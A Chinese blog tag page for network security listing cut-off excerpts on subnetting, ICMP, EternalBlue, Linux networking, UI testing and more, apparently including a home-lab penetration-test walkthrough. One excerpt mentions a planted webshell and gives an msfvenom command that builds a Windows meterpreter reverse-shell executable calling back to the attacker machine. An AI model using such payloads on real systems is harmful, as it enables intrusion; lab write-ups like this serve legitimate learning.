标签:网络安全
1.靶机信息。 win7 x64:ip:192.168.248.129 2008: ip:192.168.138 win2k3:192.168.52.141 攻击机信息: kali:集成各种攻击工具  ip:192.168.248.128 win10:主要进行数据整理。 2.信息搜集。 1)使用k
子网掩码、前缀长度、IP地址数的换算 子网掩码 子网掩码只有一个功能,就是将IP地址划分为网络地址和主机地址两部分。 如同现实生活中的通讯地址,可以看作省市部分和具体门牌号部分。相同的IP地址,但掩码不一样,则指向的网络部分和主机部分不一样。子网掩码用来判断任意两台计算机的IP地址是否在同一个子
ICMP ICMP用来传递差错控制,查询等信息。 ICMP Echo消息常用于诊断源和目的之间的网络连通性,同时还可以提供其他信息,如报文往返时间等。 当网络设备无法保证访问目标网络时,会自动发送ICMP目的不可达报文到发送端设备 type表示ICMP消息类型,code表示同一消息类型中的不同信息
一.本文所涉及的内容(Contents) 本文所涉及的内容(Contents) 背景(Contexts) 进制转换算法(Convert) (二、八、十六进制) → (十进制)二进制 → 十进制 八进制 → 十进制 十六进制 → 十进制 (十进制) → (二、八、十六进制)十进制 → 二进制
  最近,Web3.0,区块链,NFT的概念很火,我实在不懂,开个贴记录一些学习中的感想。Web 3.0可以看成一套标准,但目前还没有统一定义。   Web 1.0:纯静态页面   Web 2.0:JS动态加静态   Web 3.0:动静态都有,还可以实现交互,比如验证码,邮箱等。   我记得验证
一.介绍。 1.什么是永恒之蓝。 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内
计算机网络知识对测试人员来说是非常重要的基础技能。无论是在平时测试工作中(比如接口测试),还是测试技术面试时,都会经常涉猎。很多基础薄弱的同学靠临时抱佛脚突击搜索学习,对系统知识和重点难点的理解总是不够透彻。本系列文章就带大家从最最基础的网络知识开始,一步一个台阶学习,最终深度理解和掌握计算机网络
1.后渗透。 之前我们已经将小马上传,在这里用webshell进行进一步渗透。 1)基于msf 利用msf生成exe,并上传。 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe
14Finger 功能齐全的Web指纹扫描和分享平台,基于vue3+django前后端分离的web架构,并集成了长亭出品的rad爬虫的功能,内置了一万多条互联网开源的指纹信息。 Github:https://github.com/b1ackc4t/14Finger 特点 基于强大的rad爬虫分析
什么是内网环境 内网环境是一种网络环境,域环境是一种管理环境 ,二者是相互独立的,域环境可以不是内网环境, 内网环境也可以不是域环境 , 两者是有明显区分的 , 只不过常见的windows内网环境中会带有域管理环境 , 但是严格来讲内网渗透就是域渗透是错误的。 内网也是指计算机网络中根据地理范围划
为 UI 页面写测试用例时(比如 web 页面,移动端页面),测试用例会存在大量元素和操作细节。当 UI 变化时,测试用例也要跟着变化, PageObject 很好的解决了这个问题。 使用 UI 自动化测试工具时(包括 selenium,appium 等),如果无统一模式进行规范,随着用例的增多会
IP地址、子网掩码、网关、DNS的介绍 概念 客户端:应用 C/S(客户端/服务器) B/S(浏览器/服务器); 服务器:客户端提供服务、数据、资源的机器; 请求:客户端向服务器索取数据; 响应:服务器对客户端请求作出反应,一般是返回给客户端数据; URL:统一资源定位符(Uniform Reso
Linux 配置IPv4或IPv6地址 配置 配置介绍 查看网络 ifconfig 网卡介绍 eth0 :本地网卡(CentOS7 是ens33) lo :内网网卡,管理内网IP,也就是127.0.0.1地址 virbr0 :虚拟网卡 配置文件 ifcfg-<interface
​ 在小程序中使用SVG,和在普通网页中不太一样。SVG也并不仅是另一种图片格式这么简单。它是代码,需要有额外的安全考量。在小程序里成功使用SVG的诀窍在于(1)结合CSS background image,(2)采用inline方式,(3)用对Data URI scheme,(4)把内容转换为
ip、ifconfig 和 route命令 linux的ip命令和ifconfig类似,但前者功能更强大,并旨在取代后者。使用ip命令,只需一个命令,你就能很轻松地执行一些网络管理任务。ifconfig是net-tools中已被废弃使用的一个命令,许多年前就已经没有维护了。iproute2套件里
​ 一旦试通了Rust通用逻辑功能和FinClip小程序的结合,可以玩的东西就很多了。我们先试试用Rust生成二维码,并以inline SVG方式提供给小程序渲染展示 前面一番操作,从小程序前端到Rust跨平台通用算法逻辑library,基本搞通。再增加其他功能的话,照虎画猫也不难。 给加密钱
服务与服务之间传递数据包,往往会因为不同的应用场景,使用不同的通讯协议进行传递。比如网站的访问,常常会使用 HTTP 协议进行传递,文件传输使用 FTP,邮件传递使用 SMTP。上述的三种类型的协议都处于网络模型中的应用层。除了应用层的常用协议之外,对于传输层的 TCP、UDP 协议,以及 Res
Kick off meeting Materials 一、对外客服流程 A1-A6:2.个人数据的内容、处理的目的是否告知数据主体(用户),以怎样的方式告知用户? A7:数据主体同意的结果在制造商侧怎样体现?制造商怎样保证数据主体的七大权利? A11:是否通过合同明确数据主体、数据控制者和处理者?